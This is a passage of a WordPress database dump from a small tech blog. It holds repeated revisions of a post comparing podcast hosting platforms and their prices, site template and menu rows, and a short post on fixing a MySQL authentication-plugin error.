-->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','inherit','closed','closed','','329-revision-v1','','','2021-02-06 13:24:35','2021-02-06 13:24:35','',329,'http://ictbank.ir/blog/index.php/2021/02/06/329-revision-v1/',0,'revision','',0),
(331,2,'2021-02-06 14:21:26','2021-02-06 14:21:26','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','inherit','closed','closed','','329-revision-v1','','','2021-02-06 14:21:26','2021-02-06 14:21:26','',329,'http://ictbank.ir/blog/index.php/2021/02/06/329-revision-v1/',0,'revision','',0),
(332,2,'2021-02-06 14:35:07','2021-02-06 14:35:07','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','inherit','closed','closed','','329-revision-v1','','','2021-02-06 14:35:07','2021-02-06 14:35:07','',329,'http://ictbank.ir/blog/index.php/2021/02/06/329-revision-v1/',0,'revision','',0),
(333,2,'2021-02-06 14:42:41','2021-02-06 14:42:41','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','inherit','closed','closed','','329-revision-v1','','','2021-02-06 14:42:41','2021-02-06 14:42:41','',329,'http://ictbank.ir/blog/index.php/2021/02/06/329-revision-v1/',0,'revision','',0),
(335,2,'2021-02-06 17:50:20','2021-02-06 17:50:20','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','inherit','closed','closed','','329-revision-v1','','','2021-02-06 17:50:20','2021-02-06 17:50:20','',329,'http://ictbank.ir/blog/index.php/2021/02/06/329-revision-v1/',0,'revision','',0),
(337,2,'2021-02-06 17:50:36','2021-02-06 17:50:36','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','inherit','closed','closed','','329-revision-v1','','','2021-02-06 17:50:36','2021-02-06 17:50:36','',329,'http://ictbank.ir/blog/index.php/2021/02/06/329-revision-v1/',0,'revision','',0),
(345,2,'2021-05-20 11:45:58','2021-05-20 11:45:58','','Default Kit','','publish','closed','closed','','default-kit','','','2025-09-20 16:29:45','2025-09-20 16:29:45','',0,'http://ictbank.ir/blog/?elementor_library=default-kit',0,'elementor_library','',0),
(358,2,'2021-05-20 20:45:39','2021-05-20 20:45:39','<p style=\"text-align: center;\">designed & maintained by <a href=\"http://www.ictbank.ir\">ICTBANK</a></p>','Footer-ictbank.ir','','publish','closed','closed','','footer-ictbank-ir','','','2021-05-20 20:49:04','2021-05-20 20:49:04','',0,'http://ictbank.ir/blog_new/?post_type=elementor_library&p=358',0,'elementor_library','',0),
(359,2,'2021-05-20 20:48:29','2021-05-20 20:48:29','<p style=\"text-align: center;\">designed & maintained by <a href=\"http://www.ictbank.ir\">ICTBANK</a></p>','Footer-ictbank.ir','','inherit','closed','closed','','358-revision-v1','','','2021-05-20 20:48:29','2021-05-20 20:48:29','',358,'http://ictbank.ir/blog_new/?p=359',0,'revision','',0),
(360,2,'2021-05-20 20:48:29','2021-05-20 20:48:29','<p style=\"text-align: center;\">designed & maintained by <a href=\"http://www.ictbank.ir\">ICTBANK</a></p>','Footer-ictbank.ir','','inherit','closed','closed','','358-revision-v1','','','2021-05-20 20:48:29','2021-05-20 20:48:29','',358,'http://ictbank.ir/blog_new/?p=360',0,'revision','',0),
(361,2,'2021-05-20 20:49:04','2021-05-20 20:49:04','<p style=\"text-align: center;\">designed & maintained by <a href=\"http://www.ictbank.ir\">ICTBANK</a></p>','Footer-ictbank.ir','','inherit','closed','closed','','358-revision-v1','','','2021-05-20 20:49:04','2021-05-20 20:49:04','',358,'http://ictbank.ir/blog_new/?p=361',0,'revision','',0),
(362,2,'2021-05-20 20:50:53','2021-05-20 20:50:53','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2021-05-20 20:50:53','2021-05-20 20:50:53','',345,'http://ictbank.ir/blog_new/?p=362',0,'revision','',0),
(363,2,'2021-05-20 20:50:53','2021-05-20 20:50:53','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2021-05-20 20:50:53','2021-05-20 20:50:53','',345,'http://ictbank.ir/blog_new/?p=363',0,'revision','',0),
(386,2,'2021-05-20 21:28:56','2021-05-20 21:28:56','','Header - Startup','','publish','closed','closed','','header-startup','','','2021-05-20 21:28:56','2021-05-20 21:28:56','',0,'http://ictbank.ir/blog_new/?elementor_library=header-startup',0,'elementor_library','',0),
(387,2,'2021-05-20 21:29:08','2021-05-20 21:29:08','','Header-barber','','publish','closed','closed','','header-barber','','','2021-05-20 21:29:08','2021-05-20 21:29:08','',0,'http://ictbank.ir/blog_new/?elementor_library=header-barber',0,'elementor_library','',0),
(401,2,'2023-12-29 13:42:01','2021-05-20 21:41:20',' ','','','publish','closed','closed','','401','','','2023-12-29 13:42:01','2023-12-29 13:42:01','',0,'http://ictbank.ir/blog_new/index.php/2021/05/20/401/',2,'nav_menu_item','',0),
(547,2,'2023-12-29 13:42:01','2021-05-22 11:20:42',' ','','','publish','closed','closed','','547','','','2023-12-29 13:42:01','2023-12-29 13:42:01','',0,'http://ictbank.ir/blog_new/?p=547',4,'nav_menu_item','',0),
(548,2,'2023-12-29 13:42:01','2021-05-22 11:20:44',' ','','','publish','closed','closed','','548','','','2023-12-29 13:42:01','2023-12-29 13:42:01','',0,'http://ictbank.ir/blog_new/?p=548',5,'nav_menu_item','',0),
(549,2,'2023-12-29 13:42:01','2021-05-22 11:20:45',' ','','','publish','closed','closed','','549','','','2023-12-29 13:42:01','2023-12-29 13:42:01','',0,'http://ictbank.ir/blog_new/?p=549',6,'nav_menu_item','',0),
(550,2,'2023-12-29 13:42:01','2021-05-22 11:21:59','','Categories','','publish','closed','closed','','categories','','','2023-12-29 13:42:01','2023-12-29 13:42:01','',0,'http://ictbank.ir/blog_new/?p=550',3,'nav_menu_item','',0),
(583,2,'2021-06-30 14:41:48','2021-06-30 14:41:48','<!-- wp:paragraph -->\n<p>if you have these errors in your log file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">PHP Warning: mysqli_connect(): The server requested authentication method unknown to the client [caching_sha2_password]\nPHP Warning: mysqli_connect(): (HY000/2054): The server requested authentication method unknown to the client</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>It means that the server\'s default authentication plugin is different from your client\'s. So you have to change the user\'s default authentication plugin by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">ALTER USER \'username\'@\'localhost\' IDENTIFIED WITH mysql_native_password BY \'password\';</pre>\n<!-- /wp:syntaxhighlighter/code -->','PHP: mysqli_connect(): The server requested authentication method unknown to the client [caching_sha2_password]','','publish','open','open','','php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password','','','2023-05-01 16:09:59','2023-05-01 16:09:59','',0,'http://ictbank.ir/blog/?p=583',0,'post','',0),
(584,2,'2021-06-30 14:41:48','2021-06-30 14:41:48','<!-- wp:paragraph -->\n<p>if you have these errors in your log file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">PHP Warning: mysqli_connect(): The server requested authentication method unknown to the client [caching_sha2_password]\nPHP Warning: mysqli_connect(): (HY000/2054): The server requested authentication method unknown to the client</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>It means that the server\'s default authentication plugin is different from your client\'s. So you have to change the user\'s default authentication plugin by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">ALTER USER \'username\'@\'localhost\' IDENTIFIED WITH mysql_native_password BY \'password\';</pre>\n<!-- /wp:syntaxhighlighter/code -->','PHP: 